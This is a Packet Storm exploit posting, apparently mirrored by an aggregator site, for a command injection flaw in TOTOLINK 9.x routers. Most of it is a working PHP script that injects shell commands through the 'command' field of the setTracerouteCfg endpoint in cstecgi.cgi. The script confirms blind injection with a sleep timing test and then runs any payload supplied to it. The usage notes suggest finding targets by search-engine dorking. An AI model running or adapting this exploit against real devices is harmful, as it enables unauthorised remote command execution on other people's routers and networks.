TOTOLINK 9.x Command Injection
2024-10-14 21:17:19 Author: packetstormsecurity.com(查看原文) 阅读量:2 收藏

=============================================================================================================================================
| # Title : TOTOLINK 9.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.totolink.net/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 71 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class TotolinkExploit {
private $targetUri;
private $sleepTime;

public function __construct($targetUri, $sleepTime = 3) {
$this->targetUri = $targetUri;
$this->sleepTime = $sleepTime;
}

// Function to send POST request and execute the command on the target
public function executeCommand($cmd) {
$num = rand(1, 500);
$url = $this->targetUri . '/cgi-bin/cstecgi.cgi';
$data = json_encode([
"command" => "127.0.0.1; {$cmd};#",
"num" => $num,
"topicurl" => "setTracerouteCfg"
]);

// Send POST request
return $this->sendPostRequest($url, $data);
}

// Check if the target is vulnerable
public function check() {
echo "Checking if the target can be exploited.\n";

// Test using echo command to see if it's vulnerable
$response = $this->executeCommand("echo test");
if (!$response || strpos($response, 'success') === false) {
return "Target is likely not vulnerable.\n";
}

// Test command injection using sleep
echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";
$start = microtime(true);
$this->executeCommand("sleep {$this->sleepTime}");
$elapsedTime = microtime(true) - $start;

echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";
if ($elapsedTime >= $this->sleepTime) {
return "Target is vulnerable: Blind command injection successful.\n";
}

return "Command injection test failed.\n";
}

// Exploit the vulnerability to run the payload
public function exploit($payload) {
echo "Executing payload on the target.\n";
$this->executeCommand($payload);
}

// Helper function to send POST requests
private function sendPostRequest($url, $postFields) {
$options = [
'http' => [
'method' => 'POST',
'header' => 'Content-Type: application/x-www-form-urlencoded',
'content' => $postFields
]
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}
}

// Example of usage
$targetUri = 'http://target-ip'; // Replace with actual target URL
$exploit = new TotolinkExploit($targetUri);
echo $exploit->check();
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================


文章来源: https://packetstormsecurity.com/files/182168/totolink9x-exec.txt
如有侵权请联系:admin#unsafe.sh